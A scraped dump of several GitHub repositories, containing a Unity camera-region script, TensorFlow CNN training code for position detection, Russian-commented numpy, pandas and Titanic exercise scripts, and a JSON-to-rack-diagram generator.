((lon >= -140.0f && lon < 170.0f) && (lat > -90.0f && lat <= -70.0f))) //The rest of Antarctica\n {\n land = true;\n region = \"Antarctica\";\n }\n else\n {\n land = false;\n }\n \n //Checks to see what ocean the camera is above if it is not above land.\n\n if (land == false)\n {\n //Pacific Ocean\n if (((lon >= -180.0f && lon < -100.0f) && (lat < 75.0f && lat >= 0.0f) && (land == false))\n || ((lon >= -180.0f && lon < -80.0f) && (lat < 0.0f && lat >= -90.0f) && (land == false))\n || ((lon >= 100.0f && lon < 180.0f) && (lat < 75.0f && lat >= -20.0f) && (land == false))\n || ((lon >= 145.0f && lon < 180.0f) && (lat < -20.0f && lat >= -90.0f) && (land == false)))\n {\n region = \"Pacific\";\n }\n\n //Atlantic Ocean\n else if (((lon >= -100.0f && lon < 20.0f) && (lat < 75.0f && lat >= 20.0f) && (land == false))\n || ((lon >= -80.0f && lon < 20.0f) && (lat < 20.0f && lat >= -90.0f) && (land == false)))\n {\n region = \"Atlantic\";\n }\n\n //Indian Ocean\n else if (((lon >= 20.0f && lon < 100.0f) && (lat < 75.0f && lat >= -20.0f) && (land == false))\n || ((lon >= 20.0f && lon < 145.0f) && (lat < -20.0f && lat >= -90.0f) && (land == false)))\n {\n region = \"Indian\";\n }\n\n //Arctic Ocean\n else if ((lon >= -180.0f && lon < 180.0f) && (lat >= 75.0f && lat <= 90.0f) && (land == false))\n {\n region = \"Arctic\";\n }\n\n }\n\n //Code block that controls the camera taking photos with every frame\n\n if (takePictures == true)\n {\n takeHiResShot = true;\n if (takeHiResShot)\n {\n RenderTexture rt = new RenderTexture(resWidth, resHeight, 24);\n Camera cam = gameObject.GetComponent<Camera>();\n cam.targetTexture = rt;\n Texture2D screenShot = new Texture2D(resWidth, resHeight, TextureFormat.RGB24, false);\n cam.Render();\n RenderTexture.active = rt;\n screenShot.ReadPixels(new Rect(0, 0, resWidth, resHeight), 0, 0);\n cam.targetTexture = null;\n RenderTexture.active = null; // JC: added to avoid errors\n Destroy(rt);\n byte[] bytes = screenShot.EncodeToPNG();\n string filename = ScreenShotName(resWidth, resHeight, region);\n System.IO.File.WriteAllBytes(filename, bytes);\n //Debug.Log(string.Format(\"Took screenshot to: {0}\", filename));\n takeHiResShot = false;\n }\n }\n \n }\n}\n" }, { "alpha_fraction": 0.6090282797813416, "alphanum_fraction": 0.6648814082145691, "avg_line_length": 35.30555725097656, "blob_id": "e2f4448825f39980e1f31d029fc892b68b2d7741", "content_id": "6804a353eff077d00269f6bc74da9df358043a38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1307, "license_type": "no_license", "max_line_length": 73, "num_lines": 36, "path": "/cnn_files/sandbox.py", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\n# File only was used for experimentation, testing new implementations\n# File not necessary for any program execution\n \ndataset1 = tf.data.Dataset.from_tensor_slices(tf.random_uniform([4, 10]))\nprint(dataset1.output_types) # ==> \"tf.float32\"\nprint(dataset1.output_shapes) # ==> \"(10,)\"\n\ndataset2 = tf.data.Dataset.from_tensor_slices(\n (tf.random_uniform([4]),\n tf.random_uniform([4, 100], maxval=100, dtype=tf.int32)))\nprint(dataset2.output_types) # ==> \"(tf.float32, tf.int32)\"\nprint(dataset2.output_shapes) # ==> \"((), (100,))\"\n\ndataset3 = tf.data.Dataset.zip((dataset1, dataset2))\nprint(dataset3.output_types) # ==> (tf.float32, (tf.float32, tf.int32))\nprint(dataset3.output_shapes) # ==> \"(10, ((), (100,)))\"\n\ndataset = tf.data.Dataset.from_tensor_slices(\n {\"a\": tf.random_uniform([4]),\n \"b\": tf.random_uniform([4, 100], maxval=100, dtype=tf.int32)})\nprint(dataset.output_types) # ==> \"{'a': tf.float32, 'b': tf.int32}\"\nprint(dataset.output_shapes) # ==> \"{'a': (), 'b': (100,)}\"\n\ndataset1 = dataset1.map(lambda x: ...)\n\ndataset2 = dataset2.flat_map(lambda x, y: ...)\n\ndataset = tf.data.Dataset.range(100)\niterator = dataset.make_one_shot_iterator()\nnext_element = iterator.get_next()\n\nfor i in range(100):\n value = sess.run(next_element)\n assert i == value\n" }, { "alpha_fraction": 0.6327661275863647, "alphanum_fraction": 0.639493465423584, "avg_line_length": 45.366973876953125, "blob_id": "cfe4c19c496788b2db0e9badd7bddcc26500bdb7", "content_id": "032b6b1614b663a25c585fabedf05804e66a6121", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5054, "license_type": "no_license", "max_line_length": 119, "num_lines": 109, "path": "/cnn_files/CreateDataset.py", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport pathlib\nimport random\nimport sys\n\n\nclass CreateDataset:\n def __init__(self, data_root, mode=\"TRAIN\", batch_size=64, sequenced=False):\n self.data_root = data_root\n self.batch_size = batch_size\n self.mode = mode\n self.sequence=sequenced\n\n @staticmethod\n def preprocess_image(image):\n image = tf.image.decode_png(image, channels=3)\n image = tf.image.resize_images(image, [112, 112], method=tf.image.ResizeMethod.BICUBIC)\n image /= 255.0\n\n return image\n\n def load_and_preprocess_image(self, path):\n return self.preprocess_image(tf.read_file(path))\n\n def process_dataset(self, dataset, size, repeat_count=1):\n if self.mode == \"TRAIN\":\n # If dataset too large, use smaller shuffle buffer size\n # Shuffle buffer size equal to size of dataset guarantees uniform shuffle\n # if not self.sequence: dataset = dataset.shuffle(buffer_size=size)\n if not self.sequence: dataset = dataset.shuffle(buffer_size=1000)\n dataset = dataset.repeat(repeat_count)\n dataset = dataset.batch(self.batch_size)\n return dataset\n\n def create_dataset(self):\n data_root = pathlib.Path(self.data_root)\n all_image_paths = list(data_root.glob('*/*'))\n all_image_paths = [str(path) for path in all_image_paths]\n if self.mode == \"TRAIN\" and not self.sequence: # Shuffle data only if training and not in a sequence\n random.shuffle(all_image_paths)\n\n example_count = len(all_image_paths)\n\n label_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir())\n label_to_index = dict((name, index) for index,name in enumerate(label_names))\n all_image_labels = [label_to_index[pathlib.Path(path).parent.name] for path in all_image_paths]\n\n # To prevent overfitting, need to finish implementation of creating validation dataset\n # TODO: Find how to save dataset to use for latter prediction when selecting best trial\n \"\"\"\n Training: 80% # Will be 70%\n Validation: 20% # Not yet implemented\n Testing: 20% # Will be 10%\n \"\"\"\n if self.mode == \"TRAIN\":\n training_start = 0\n training_end = int(example_count * 0.8)\n # validation_start = training_end\n # validation_end = int(example_count * 0.9)\n testing_start = training_end\n testing_end = example_count\n\n # Creates dataset of image paths\n train_path_ds = tf.data.Dataset.from_tensor_slices(all_image_paths[training_start:training_end])\n # validate_path_ds = tf.data.Dataset.from_tensor_slices(all_image_labels[validation_start:validation_end])\n test_path_ds = tf.data.Dataset.from_tensor_slices(all_image_paths[testing_start:testing_end])\n\n # Maps each dataset value to the load_and_preprocess_image function\n # Believe this is the cause of being unable to pickle the dataset\n train_image_ds = train_path_ds.map(self.load_and_preprocess_image)\n # validate_image_ds = validate_path_ds.map(self.load_and_preprocess_image)\n test_image_ds = test_path_ds.map(self.load_and_preprocess_image)\n\n # Create datasets of corresponding labels for images\n train_label_ds = tf.data.Dataset.from_tensor_slices(all_image_labels[training_start:training_end])\n # validate_label_ds = tf.data.Dataset.from_tensor_slices(all_image_labels[validation_start:validation_end])\n test_label_ds = tf.data.Dataset.from_tensor_slices(all_image_labels[testing_start:testing_end])\n\n # Creates full datasets of image-label pairs\n train_ds = self.process_dataset(tf.data.Dataset.zip((train_image_ds, train_label_ds)), example_count)\n # validate_ds = self.process_dataset(tf.data.Dataset.zip((validate_image_ds, validate_label_ds)),\n # example_count)\n test_ds = self.process_dataset(tf.data.Dataset.zip((test_image_ds, test_label_ds)), example_count)\n\n return train_ds, test_ds\n\n elif self.mode == \"PREDICT\":\n # Creates dataset of image paths\n predict_path_ds = tf.data.Dataset.from_tensor_slices(all_image_paths)\n\n # Maps each dataset value to the load_and_preprocess_image function\n # Believe this is the cause of being unable to pickle the dataset\n predict_ds = predict_path_ds.map(self.load_and_preprocess_image)\n\n return predict_ds\n\n else:\n sys.stderr.write(\"ERR:invalid mode passed to CreateDataset\")\n exit(-1)\n\n\nif __name__ == \"__main__\":\n tf.enable_eager_execution()\n test = CreateDataset(\"/share/projects/attitude/els_data/\")\n trn_ds, tst_ds = test.create_dataset()\n iterator = trn_ds.make_one_shot_iterator()\n tensor = iterator.get_next()\n print(tensor)\n" }, { "alpha_fraction": 0.5874145030975342, "alphanum_fraction": 0.6041039824485779, "avg_line_length": 35.73366928100586, "blob_id": "fc8387f89f8a023b721223f12ef6cfabd848639c", "content_id": "b6a9f645b7a5d806141381fa8120c6516195740d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7310, "license_type": "no_license", "max_line_length": 120, "num_lines": 199, "path": "/cnn_files/cnn_classifier.py", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "from __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\nfrom CreateDataset import CreateDataset\nimport sys\nimport numpy\nimport random\nimport os\nimport time\n\nBATCH_SIZE = 64\nMODE = \"TRAIN\"\nOUTPUT_NODES = 11\nDATA_PATH = \"/share/projects/attitude_data/mb/mb_data\"\nTRIALS = 1\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\"\"\"List of all tunable hyperparameters\"\"\"\nall_params = {\n # Convolutional Layer #1 Params\n \"conv1_filters\": range(32, 128, 4),\n \"conv1_kernel\": [2, 3, 4, 5, 6],\n \"activation\": [tf.nn.leaky_relu, tf.nn.relu],\n \"kernel_initializer\": [tf.initializers.ones, tf.initializers.random_uniform, tf.initializers.zeros],\n\n # Convolutional Layer #2 Params\n \"conv2_filters\": range(32, 128, 4),\n \"conv2_kernel\": [2, 3, 4, 5, 6],\n\n # Final params\n \"dropout\": numpy.arange(0.2, 0.8, 0.1),\n \"units\": [128, 256, 512, 1024, 2048],\n \"learning_rate\": numpy.arange(0.001, 0.023, 0.003)\n}\n\n\"\"\"Parameters to be used in each trial of testing\"\"\"\nselected_params = {}\n\n\ndef cnn_model_fn(features, labels, mode):\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n \"\"\"Model function for CNN\"\"\"\n input_layer = tf.reshape(features, [-1, 112, 112, 3])\n\n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=selected_params[\"conv1_filters\"],\n kernel_size=selected_params[\"conv1_kernel\"],\n padding=\"same\",\n activation=selected_params[\"activation\"]\n )\n\n # Pooling Layer #1\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #1\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n # Unable to change filter size of 2nd convolutional layer because changes output size\n # Caused mismatch with provided labels for evaluation\n # filters=selected_params[\"conv2_filters\"],\n filters=64,\n kernel_size=selected_params[\"conv2_kernel\"],\n padding=\"same\",\n activation=selected_params[\"activation\"]\n )\n\n # Pooling Layer #2\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Dense Layer\n pool2_flat = tf.reshape(pool2, [-1, int(int(input_layer.shape[1])/4)**2 * BATCH_SIZE])\n dense = tf.layers.dense(inputs=pool2_flat, units=selected_params[\"units\"], activation=selected_params[\"activation\"])\n dropout = tf.layers.dropout(inputs=dense, rate=selected_params[\"dropout\"], training=(mode ==\n tf.estimator.ModeKeys.TRAIN))\n\n # Logits Layer\n logits = tf.layers.dense(inputs=dropout, units=OUTPUT_NODES)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add 'softmax_tensor' to the graph. It is used for PREDICT and by the 'logging_hook'.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=selected_params[\"learning_rate\"])\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step()\n )\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])\n }\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops\n )\n\n\ndef main(unused_argv):\n dataset_creator = CreateDataset(DATA_PATH, MODE)\n os.system('rm -rf /share/projects/attitude/cnn_files/tmp/space_classifier_model_*')\n\n # Set up logging for predictions\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, every_n_iter=50)\n\n if MODE == \"TRAIN\":\n # Load training and eval data\n train_ds, eval_ds = dataset_creator.create_dataset()\n\n def train_input_fn(dataset):\n iterator = dataset.make_one_shot_iterator()\n features, labels = iterator.get_next()\n return features, labels\n\n def eval_input_fn(dataset):\n iterator = dataset.make_one_shot_iterator()\n features, labels = iterator.get_next()\n return features, labels\n\n with open('cnn_results.csv', 'w+') as file:\n for i in range(TRIALS):\n # Model data logged to ./tmp/space_classifier_model_{VARIABLE}\n # New directory placed\n classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn, model_dir=\"/share/projects/attitude/cnn_files/tmp/space_classifier_model_\"\n + '%03d' % i)\n start = time.time()\n for hp in all_params:\n selected_params[hp] = random.choice(all_params[hp])\n\n # Must delete Tensor Flow checkpoints in order to account for adapting CNN\n classifier.train(\n input_fn=lambda: train_input_fn(train_ds),\n # input_fn=train_input_fn,\n steps=None,\n hooks=[logging_hook])\n\n eval_results = classifier.evaluate(input_fn=lambda: eval_input_fn(eval_ds))\n print(eval_results)\n\n end = time.time()\n\n file.write('Trial %03d\\n' % i)\n for param in selected_params:\n file.write(\"%s, %s\\n\" % (param, selected_params[param]))\n file.write(\"--------\\n\")\n for result in eval_results:\n file.write(\"%s, %s\\n\" % (result, eval_results[result]))\n file.write(\"run_time, %s\\n\" % (end - start))\n file.write(\"\\n\")\n file.flush()\n\n elif MODE == \"TEST\":\n pass\n\n elif MODE == \"PREDICT\":\n # Load image(s) for prediction\n predict_ds = dataset_creator.create_dataset()\n\n def predict_input_fn(dataset):\n iterator = dataset.make_one_shot_iterator()\n features = iterator.get_next()\n return features\n\n # Select appropriate trial number to run prediction on that model\n trial_number = \"000\"\n classifier = tf.estimator.Estimator(\n model_fn=cnn_model_fn,\n model_dir=\"/share/projects/attitude/cnn_files/tmp/space_classifier_model_\" + trial_number)\n\n predict_results = classifier.predict(input_fn=lambda: predict_input_fn(predict_ds))\n results = next(predict_results, \"GO\")\n while results != \"GO\":\n print(results)\n results = next(predict_results, \"GO\")\n\n else:\n sys.stderr.write(\"ERR:Invalid mode passed to main function of cnn_classifier\")\n exit(-1)\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n" } ]
9
c4e8ece0/pyml
https://github.com/c4e8ece0/pyml
88d443d9cf583ebdd506123de6426e68056bfe57
3147ee8721d7ca3294b04074c552ee2334d54ff1
8935c2ff55ea9e27a0ce3a0db0ce3fbac36b370c
refs/heads/master
2021-04-26T16:43:28.941068
2016-02-01T01:04:50
2016-02-01T01:04:50
50,798,732
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6806346774101257, "alphanum_fraction": 0.7050447463989258, "avg_line_length": 29.922077178955078, "blob_id": "fac0cd402897555be8a4acf0d9e4a6cb64f6764e", "content_id": "b1b3ce3dfe2744b36a8468ca095c554ee861147a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3856, "license_type": "no_license", "max_line_length": 77, "num_lines": 77, "path": "/01/01-3.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# ГЕНЕРАЦИЯ СЛУЧАЙНОЙ МАТРИЦЫ\r\n# Сгенерируйте матрицу, состоящую из 1000 строк и 50 столбцов, элементы\r\n# которой являются случайными из нормального распределения N(1,10).\r\n\r\n# Функция для генерации чисел из нормального распределения: np.random.normal\r\n# Параметры:\r\n# loc: среднее нормального распределения (в нашем случае 1)\r\n# scale: стандартное отклонение нормального распределения (в нашем случае 10)\r\n# size: размер матрицы (в нашем случае (1000, 50))\r\n\r\nimport numpy as np\r\nX = np.random.normal(loc=1, scale=10, size=(1000, 50))\r\n#print X\r\nexit\r\n\r\n# НОРМИРОВКА МАТРИЦЫ\r\n# Произведите нормировку матрицы из предыдущего задания: вычтите из каждого\r\n# столбца его среднее значение, а затем поделите на его стандартное\r\n# отклонение.\r\n\r\n# Функция для вычисления среднего: np.mean\r\n# Функция для вычисления стандартного отклонения: np.std\r\n\r\n# Первый параметр — матрица, для которой производятся вычисления. Также\r\n# полезным будет параметр axis, который указывает, по какому измерению\r\n# вычисляются среднее и стандартное отклонение (если axis=0, то по\r\n# столбцам, если axis=1, то по строкам; если его не указывать, то данные\r\n# величины будут вычислены по всей матрице).\r\n\r\nm = np.mean(X, axis=0)\r\nstd = np.std(X, axis=0)\r\nX_norm = ((X - m) / std)\r\n#print X_norm\r\n\r\n\r\n# ОПЕРАЦИИ НАД ЭЛЕМЕНТАМИ МАТРИЦЫ\r\n\r\n# Выведите для заданной матрицы номера строк, сумма элементов в которых\r\n# превосходит 10.\r\n\r\n# Функция для подсчета суммы: np.sum\r\n# Аргументы аналогичны функциям np.mean и np.std.\r\n\r\n# К матрицам можно применять логические операции, которые будут применяться\r\n# поэлементно. Соответственно, результатом такой операции будет матрица\r\n# такого же размера, в ячейках которой будет записано либо True, либо False.\r\n# Индексы элементов со значением True можно получить с помощью функции\r\n# np.nonzero.\r\n\r\nZ = np.array([[4, 5, 0],\r\n [1, 9, 3],\r\n [5, 1, 1],\r\n [3, 3, 3],\r\n [9, 9, 9],\r\n [4, 7, 1]])\r\n\r\nr = np.sum(Z, axis=1)\r\nprint np.nonzero(r > 10)\r\n\r\n# Объединение матриц\r\n\r\n# Сгенерируйте две единичные матрицы (т.е. с единицами на диагонали) размера\r\n# 3x3. Соедините две матрицы в одну размера 6x3.\r\n\r\n# Функция для генерации единичной матрицы: np.eye\r\n# Аргумент: число строк (или, что эквивалентно, столбцов).\r\n\r\n# Функция для вертикальной стыковки матриц: np.vstack((A, B))\r\n\r\n# Код для самопроверки\r\n\r\nA = np.eye(3)\r\nB = np.eye(3)\r\nprint A\r\nprint B\r\nAB = np.vstack((A, B))\r\nprint AB\r\n" }, { "alpha_fraction": 0.7149321436882019, "alphanum_fraction": 0.7265675663948059, "avg_line_length": 40.97222137451172, "blob_id": "94713744dd55e3032ba0bb1c25ef92fd1c901538", "content_id": "6950e519de90e794fc3a2a89b6a4511785c9f984", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2187, "license_type": "no_license", "max_line_length": 122, "num_lines": 36, "path": "/01/01-6-titanic.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# 1. Загрузите выборку из файла titanic.csv с помощью пакета Pandas.\r\nimport pandas\r\nimport numpy as np\r\n\r\ndata = pandas.read_csv('titanic.csv', index_col='PassengerId')\r\n\r\n# 2. Оставьте в выборке четыре признака: класс пассажира (Pclass),\r\n# цену билета (Fare), возраст пассажира (Age) и его пол (Sex).\r\n\r\ndata.drop(['PassengerId', 'SibSp', 'Name', 'Parch', 'Ticket', 'Cabin', 'Embarked'], inplace=True, axis=1, errors='ignore')\r\n\r\n# 3. Обратите внимание, что признак Sex имеет строковые значения.\r\n# 4. Выделите целевую переменную — она записана в столбце Survived.\r\n# 5. В данных есть пропущенные значения — например, для некоторых пассажиров\r\n# неизвестен их возраст. Такие записи при чтении их в pandas принимают\r\n# значение nan. Найдите все объекты, у которых есть пропущенные признаки,\r\n# и удалите их из выборки.\r\ndata = data.dropna(axis=0)\r\ndata = data.replace({'male': 1, 'female': 2})\r\nY = data[\"Survived\"]\r\ndata.drop(['Survived'], inplace=True, axis=1, errors='ignore')\r\nprint data.tail()\r\n\r\n# 6. Обучите решающее дерево с параметром random_state=241 и остальными\r\n# параметрами по умолчанию.\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nclf = DecisionTreeClassifier(random_state=241)\r\nclf.fit(data, Y)\r\n\r\n# 7. Вычислите важности признаков и найдите два признака с наибольшей\r\n# важностью. Их названия будут ответами для данной задачи (в качестве\r\n# ответа укажите названия признаков через запятую или пробел, порядок\r\n# не важен).\r\nimportances = clf.feature_importances_\r\nprint importances # Age Fare\r\n" }, { "alpha_fraction": 0.6535804271697998, "alphanum_fraction": 0.6695979833602905, "avg_line_length": 34.59770202636719, "blob_id": "d07c8994699b8bf889cc7dfbe1abdfeb839a9491", "content_id": "da1ba84cbe3bd9d1f421aba1880aba9312e8aa2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4539, "license_type": "no_license", "max_line_length": 86, "num_lines": 87, "path": "/01/01-4-pandas.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# Пример загрузки данных в Pandas:\r\n# src https://www.kaggle.com/c/titanic/data\r\n\r\nimport pandas\r\n\r\ndata = pandas.read_csv('titanic.csv', index_col='PassengerId')\r\n\r\n# Данные будут загружены в виде DataFrame, с помощью которого можно\r\n# удобно работать с ними. В данном случае параметр\r\n# index_col='PassengerId’\r\n# означает, что колонка PassengerId задает нумерацию строк данного\r\n# датафрейма\r\n\r\n# Для того, чтобы посмотреть что представляют из себя данные, можно\r\n# воспользоваться несколькими способами:\r\n\r\n# 1. более привычным с точки зрения Python (если индекс указывается\r\n# только один, то производится выбор строк):\r\ndata[:10]\r\n\r\n# 2. или же воспользоваться методом датафрейма:\r\ndata.head()\r\n\r\n# Один из способов доступа к столбцам датафрейма — использовать\r\n# квадратные скобки и название столбца:\r\ndata['Pclass']\r\n# print data['Pclass'].value_counts()\r\n\r\n# 1. Какое количество мужчин и женщин ехало на корабле? В качестве ответа приведите\r\n# два числа через пробел.\r\nprint \"1 --------------------------------\\n\"\r\nprint\"Sex:\\n\"\r\nprint data['Sex'].value_counts() # 577 314\r\n\r\n# 2. Какой части пассажиров удалось выжить? Посчитайте долю выживших пассажиров.\r\n# Ответ приведите в процентах (число в интервале от 0 до 100, знак процента не нужен).\r\nprint \"\\n\\n2 --------------------------------\\n\"\r\ntotal = data['Survived'].size*1.0\r\nlive = data['Survived'].sum()*1.0\r\nprint(\"Survive: %d\\n\", live)\r\nprint(\"Total: %d\\n\", total)\r\nprint \"Survived %:\"\r\nprint live/total*100.0\r\n\r\n# 3. Какую долю пассажиры первого класса составляли среди всех пассажиров?\r\n# Ответ # приведите в процентах (число в интервале от 0 до 100, знак процента\r\n# не нужен).\r\nprint \"\\n\\n3 --------------------------------\\n\"\r\nprint data['Pclass'].value_counts()\r\nfc = data['Pclass'].value_counts()[1]*1.0\r\nprint fc/total*100\r\n\r\n# 4. Какого возраста были пассажиры? Посчитайте среднее и медиану возраста\r\n# пассажиров. В качестве ответа приведите два числа через пробел.\r\nprint \"\\n\\n4 --------------------------------\\n\"\r\nprint(\"Mean: %.2f\", data[\"Age\"].mean())\r\nprint(\"Median: %.2f\", data[\"Age\"].median())\r\n\r\n# 5. Коррелируют ли число братьев/сестер с числом родителей/детей?\r\n# Посчитайте корреляцию Пирсона между признаками SibSp и Parch.\r\nprint \"\\n\\n5 --------------------------------\\n\"\r\nprint data.corr(\"pearson\")\r\n\r\n# 6. Какое самое популярное женское имя на корабле? Извлеките из полного\r\n# имени пассажира (колонка Name) его личное имя (First Name). Это\r\n# задание — типичный пример того, с чем сталкивается специалист по анализу\r\n# данных. Данные очень разнородные и шумные, но из них требуется извлечь\r\n# необходимую информацию. Попробуйте вручную разобрать несколько значений\r\n# столбца Name и выработать правило для извлечения имен, а также разделения\r\n# их на женские и мужские.\r\nprint \"\\n\\n6 --------------------------------\\n\"\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\ndef leaders(xs, top=100):\r\n counts = defaultdict(int)\r\n for x in xs:\r\n counts[x] += 1\r\n return sorted(counts.items(), reverse=True, key=lambda tup: tup[1])[:top]\r\n\r\ncnt = []\r\nfor index, row in data.iterrows():\r\n for name in row[\"Name\"].split(\" \"):\r\n cnt[len(cnt):] = [name]\r\n\r\nprint leaders(cnt)\r\n" }, { "alpha_fraction": 0.7614991664886475, "alphanum_fraction": 0.7691652178764343, "avg_line_length": 39.92856979370117, "blob_id": "e1331fdbc8df96245aa6d946538c8f8821d83ca9", "content_id": "1042f21db7a25fce3e12a6c60a9d48aa3db9d0ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 78, "num_lines": 28, "path": "/01/01-5-decisiontrees.py", "repo_name": "c4e8ece0/pyml", "src_encoding": "UTF-8", "text": "# Одна из особенностей решающих деревьев заключается в том, что они позволяют\r\n# получать важности всех используемых признаков. Важность признака можно\r\n# оценить на основе того, как сильно улучшился критерий качества благодаря\r\n# использованию этого признака в вершинах дерева.\r\n\r\n# РЕАЛИЗАЦИЯ В SCIKIT-LEARN\r\n# В библиотеке scikit-learn решающие деревья реализованы в классах\r\n# sklearn.tree.DecisionTreeСlassifier (для классификации)\r\n# и sklearn.tree.DecisionTreeRegressor (для регрессии). Обучение модели\r\n# производится с помощью функции fit.\r\n\r\nimport numpy as np\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nX = np.array([[1, 2], [3, 4], [5, 6]])\r\ny = np.array([0, 1, 0])\r\nclf = DecisionTreeClassifier()\r\nclf.fit(X, y)\r\nimportances = clf.feature_importances_\r\n\r\n# Переменная importances будет содержать массив \"важностей\" признаков. Индекс\r\n# в этом массиве соответствует индексу признака в данных.\r\nprint importances\r\n\r\n# Стоит обратить внимание, что данные могут содержать пропуски. Pandas хранит\r\n# такие значения как nan (not a number). Для того, чтобы проверить, является\r\n# ли число nan'ом, можно воспользоваться функцией np.isnan.\r\nprint np.isnan(X)\r\n" } ]
4
tnaganawa/json-to-rackdiag
https://github.com/tnaganawa/json-to-rackdiag
393ed183bd78057c5b3b3ca4b2a1071e9d675eac
386165ce9184705721c758d62721926430943655
6281a9d9ed56003a2211795c54164e0fd4d37344
refs/heads/master
2021-01-22T21:13:49.505966
2017-03-18T14:48:47
2017-03-18T14:48:47
85,408,171
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7487684488296509, "alphanum_fraction": 0.7512315511703491, "avg_line_length": 29.923076629638672, "blob_id": "daf6ad53aa2dcc44a403c3e88ac0345bf2e5ded9", "content_id": "f1e6ae38237e86030c3d47ee208ad04a3e3325ee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 406, "license_type": "permissive", "max_line_length": 85, "num_lines": 13, "path": "/README.md", "repo_name": "tnaganawa/json-to-rackdiag", "src_encoding": "UTF-8", "text": "# json-to-rackdiag\ncreate rack-diagram from json, which could be added to git repo or searched by kibana\n\n# install\n(tested on centos7) \nsudo pip install blockdiag \nsudo pip install nwdiag \nsudo yum install graphviz \ncd /var/tmp \ngit clone [email protected]:tnaganawa/json-to-rackdiag.git \ncd json-to-rackdiag \npython json-to-rackdiag.py \nfirefox /tmp/json-to-rackdiag.svg /tmp/json-to-rack-pos-diag.svg \n\n\n" }, { "alpha_fraction": 0.607038140296936, "alphanum_fraction": 0.6133221387863159, "avg_line_length": 19.577587127685547, "blob_id": "4258451c6a06937a353524a87b634dd6bb969fe2", "content_id": "99bef7267b4578bb5b4f584ab12ed007cc78ce13", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2387, "license_type": "permissive", "max_line_length": 73, "num_lines": 116, "path": "/json-to-rackdiag.py", "repo_name": "tnaganawa/json-to-rackdiag", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport os\nimport json\n\ntmp_filename_rackpos_diag='/tmp/json-to-rack-pos-diag'\ntmp_filename='/tmp/json-to-rackdiag'\njson_filepath='/var/tmp/json-to-rackdiag/json-to-rackdiag.json'\n\n#####\n\ndef create_str_each_u_from_each_u(rack):\n str_each_u=''\n for each_u in rack['each_u']:\n tmp_each_u=each_u.copy()\n if (not 'serial' in tmp_each_u):\n tmp_each_u['serial']=None\n elif (not 'hostname' in tmp_each_u):\n tmp_each_u['hostname']=None\n str_each_u += '{position}:{hostname}\\\\n{serial}\\n'.format(**tmp_each_u)\n return str_each_u\n \n\ndef main():\n \n ##\n # read json\n ##\n with open(json_filepath) as f:\n js=json.load(f)\n\n ##\n # create rack-pos-diagram\n ##\n racks=[]\n (max_rack_x, max_rack_y)=(0, 0)\n for rack in js['racks']:\n if (rack['rack_x'] > max_rack_x):\n max_rack_x = rack['rack_x']\n if (rack['rack_y'] > max_rack_y):\n max_rack_y = rack['rack_y']\n #print (max_rack_x, max_rack_y)\n\n for i in range(max_rack_y):\n racks.append([str() for i in range(max_rack_x)])\n\n #print (racks)\n\n for rack in js['racks']:\n rack_x=rack['rack_x']-1\n rack_y=rack['rack_y']-1\n # print (rack_x, rack_y)\n racks[rack_y][rack_x]=rack['rackname']\n\n #print (racks)\n str_for_racks=''\n for y in range(len(racks)):\n line_of_rack=racks[y]\n str_for_racks+='{'\n for x in range(len(line_of_rack)):\n #print (str_for_racks)\n 